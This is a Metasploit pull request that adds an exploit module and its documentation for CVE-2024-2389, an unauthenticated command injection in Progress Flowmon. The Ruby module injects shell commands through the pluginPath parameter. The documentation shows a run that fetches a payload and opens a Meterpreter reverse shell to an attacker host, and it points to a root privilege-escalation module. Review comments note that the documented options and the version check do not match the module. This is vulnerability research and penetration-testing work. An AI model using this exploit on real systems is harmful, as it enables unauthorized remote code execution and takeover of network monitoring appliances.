Add module for Flowmon cmd injection CVE-2024-2389 #19150
Merged: 3 commits merged into rapid7:master from DaveYesland:module/flowmon_cmd_injection_cve-2024-2389 on May 29, 2024
documentation/modules/exploit/linux/http/progress_flowmon_unauth_cmd_injection.md (91 additions, 0 deletions)
@@ -0,0 +1,91 @@ | ||
## Vulnerable Application | ||
CVE-2024-2389: Progress Flowmon Unauthenticated Command Injection | ||
|
||
For more details on the vulnerability: | ||
https://rhinosecuritylabs.com/research/cve-2024-2389-in-progress-flowmon/ | ||
|
||
https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability | ||
|
||
This application is available in cloud marketplaces: | ||
- https://portal.azure.com/#view/Microsoft_Azure_Marketplace/GalleryItemDetailsBladeNopdl/id/progresssoftwarecorporation.flowmon | ||
- https://aws.amazon.com/marketplace/pp/prodview-6phnrhkekuzka | ||
- https://console.cloud.google.com/marketplace/product/flowmon-public/flowmon-collector-for-google-cloud | ||
|
||
|
||
## Verification Steps | ||
1. Install the application | ||
1. Start msfconsole | ||
1. Do: `use exploits/linux/http/progress_flowmon_unauth_cmd_injection` | ||
1. Do: `set RHOSTS <target flowmon>` | ||
1. Do: `set RPORT <port flowmon is running on>` | ||
1. Do: `set LHOST <your host IP>` | ||
1. Do: `run` | ||
1. You should get a shell as the `flowmon` user. | ||
1. (Optional) use the module `exploit/linux/local/progress_flowmon_sudo_privesc_2024` to gain root privileges. | ||
|
||
## Scenarios | ||
|
||
### Progress Flowmon 12.2 | ||
|
||
``` | ||
msf6 exploit(linux/http/progress_flowmon_unauth_cmd_injection) > show options | ||
|
||
Module options (exploit/linux/http/progress_flowmon_unauth_cmd_injection): | ||
|
||
Name Current Setting Required Description | ||
---- --------------- -------- ----------- | ||
PRIVESC true yes Automatically try privesc to add sudo entry | ||
Proxies no A proxy chain of format type:host:port[,type:host:port][...] | ||
RHOSTS 172.174.209.101 yes The target host(s), see https://docs.metasploit.com/docs/using-meta sploit/basics/using-metasploit.html | ||
RPORT 443 yes The target port (TCP) | ||
SSL true no Negotiate SSL/TLS for outgoing connections | ||
TARGETURI / yes The URI path to Flowmon | ||
VHOST no HTTP server virtual host | ||
|
||
|
||
Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp): | ||
|
||
Name Current Setting Required Description | ||
---- --------------- -------- ----------- | ||
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP | ||
, WGET) | ||
FETCH_DELETE false yes Attempt to delete the binary after execution | ||
FETCH_FILENAME TkHAXYbQwlH no Name to use on remote system when storing payload; cannot contain spaces or slashes | ||
FETCH_SRVHOST no Local IP to use for serving payload | ||
FETCH_SRVPORT 8080 yes Local port to use for serving payload | ||
FETCH_URIPATH no Local URI to use for serving payload | ||
FETCH_WRITABLE_DIR yes Remote writable dir to store payload; cannot contain space | ||
s | ||
LHOST 138.111.211.11 yes The listen address (an interface may be specified) | ||
LPORT 4444 yes The listen port | ||
|
||
|
||
Exploit target: | ||
|
||
Id Name | ||
-- ---- | ||
0 Automatic | ||
|
||
|
||
|
||
View the full module info with the info, or info -d command. | ||
|
||
msf6 exploit(linux/http/flowmon_unauth_cmd_injection) > run | ||
|
||
[*] Started reverse TCP handler on 138.111.211.11:4444 | ||
[*] Running automatic check ("set AutoCheck false" to disable) | ||
[*] Checking if 172.174.209.101:443 can be exploited! | ||
[*] Detected version: 12.02.06 | ||
[+] The target is vulnerable. Version 12.02.06 is vulnerable. | ||
[*] Attempting to execute payload... | ||
[*] Meterpreter session 1 opened (138.111.211.11:4444 -> 172.174.209.101:48856) at 2024-05-01 15:22:24 +0000 | ||
|
||
meterpreter > sysinfo | ||
Computer : flowmon.my3m4o21xjze5fomtxp5e53h2h.bx.internal.cloudapp.net | ||
OS : CentOS 7.9.2009 (Linux 3.10.0-1160.76.1.el7.flowmon.x86_64) | ||
Architecture : x64 | ||
BuildTuple : x86_64-linux-musl | ||
Meterpreter : x64/linux | ||
meterpreter > getuid | ||
Server username: flowmon | ||
``` |
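Review bot: The `show options` capture lists a `PRIVESC` option ("Automatically try privesc to add sudo entry"), but the module in this PR only registers `TARGETURI` in `register_options`, so the documented output does not match the module; either drop that row or document where the option comes from. The `run` prompt also reads `exploit(linux/http/flowmon_unauth_cmd_injection)` while the options header and the file path use `progress_flowmon_unauth_cmd_injection`; the scenario should be re-captured from the final module name. Minor: the `RHOSTS` description is split mid-URL (`using-meta sploit`).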
modules/exploits/linux/http/progress_flowmon_unauth_cmd_injection.rb (94 additions, 0 deletions)
@@ -0,0 +1,94 @@ | ||
## | ||
# This module requires Metasploit: https://metasploit.com/download | ||
# Current source: https://github.com/rapid7/metasploit-framework | ||
## | ||
|
||
class MetasploitModule < Msf::Exploit::Remote | ||
Rank = ExcellentRanking | ||
|
||
include Msf::Exploit::Remote::HttpClient | ||
prepend Msf::Exploit::Remote::AutoCheck | ||
|
||
def initialize(info = {}) | ||
super( | ||
update_info( | ||
info, | ||
'Name' => 'Flowmon Unauthenticated Command Injection', | ||
'Description' => %q{ | ||
This module exploits an unauthenticated command injection vulnerability in Progress Flowmon | ||
versions before v12.03.02. | ||
}, | ||
'Author' => [ | ||
'Dave Yesland with Rhino Security Labs', | ||
], | ||
'License' => MSF_LICENSE, | ||
'References' => [ | ||
['CVE', '2024-2389'], | ||
['URL', 'https://rhinosecuritylabs.com/research/cve-2024-2389-in-progress-flowmon/'], | ||
['URL', 'https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability'] | ||
], | ||
'DisclosureDate' => '2024-04-23', | ||
'Notes' => { | ||
'Stability' => [ CRASH_SAFE ], | ||
'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK], | ||
'Reliability' => [ REPEATABLE_SESSION ] | ||
}, | ||
'Platform' => ['unix', 'linux'], | ||
'Arch' => [ARCH_CMD], | ||
'Targets' => [['Automatic', {}]], | ||
'Privileged' => false, | ||
'DefaultOptions' => { | ||
'SSL' => true, | ||
'RPORT' => 443 | ||
} | ||
) | ||
) | ||
|
||
register_options([ | ||
OptString.new('TARGETURI', [true, 'The URI path to Flowmon', '/']) | ||
]) | ||
end | ||
|
||
def execute_command(cmd) | ||
send_request_cgi( | ||
'uri' => normalize_uri(datastore['TARGETURI'], 'service.pdfs', 'confluence'), | ||
'method' => 'GET', | ||
'vars_get' => { | ||
'file' => rand_text_alphanumeric(8), | ||
'lang' => rand_text_alphanumeric(8), | ||
'pluginPath' => "$(#{cmd})" | ||
} | ||
) | ||
end | ||
|
||
def exploit | ||
print_status('Attempting to execute payload...') | ||
execute_command(payload.encoded) | ||
end | ||
|
||
def check | ||
print_status("Checking if #{peer} can be exploited!") | ||
|
||
uri = normalize_uri(target_uri.path, 'homepage/auth/login') | ||
res = send_request_cgi( | ||
'uri' => uri, | ||
'method' => 'GET' | ||
) | ||
|
||
return CheckCode::Unknown('Connection failed') unless res | ||
return CheckCode::Safe('Target does not appear to be running Progress Flowmon') unless res.code == 200 && res.get_html_document.xpath('//title').text == 'Flowmon Web Interface' | ||
|
||
# Use a regular expression to extract the version number from the response | ||
version = res.body.match(%r{/favicon\.ico\?v=([\d.]+)}) | ||
|
||
return CheckCode::Unknown('Unable to determine the version from the favicon link.') unless version && version[1] | ||
|
||
print_status("Detected version: #{version[1]}") | ||
|
||
if Rex::Version.new(version[1]) <= Rex::Version.new('12.03.02') | ||
CheckCode::Vulnerable("Version #{version[1]} is vulnerable.") | ||
else | ||
CheckCode::Safe("Version #{version[1]} is not vulnerable.") | ||
end | ||
end | ||
end |
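Review bot: The version comparison in `check` uses `Rex::Version.new(version[1]) <= Rex::Version.new('12.03.02')`, but the description says versions before v12.03.02 are affected, so the first fixed release would be reported as `CheckCode::Vulnerable`; change the comparison to `<` (or, if 12.03.02 really is affected, fix the description to match). `execute_command` also discards the response, so `exploit` never reports a connection failure or a non-200 reply; a `fail_with(Failure::Unreachable, ...)` when the response is nil would make failures visible, bearing in mind that a blocking payload may legitimately not return. Minor style: `[ IOC_IN_LOGS, ARTIFACTS_ON_DISK]` has inconsistent bracket spacing.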
Not a blocker: As a sanity question; is fingerprinting on `homepage/auth/login` and having `fav.ico?v=....` enough to uniquely identify the application as flowmon - or are there other checks we can add to have a more rigorous check
I've added a check to ensure the following html appears on the login page: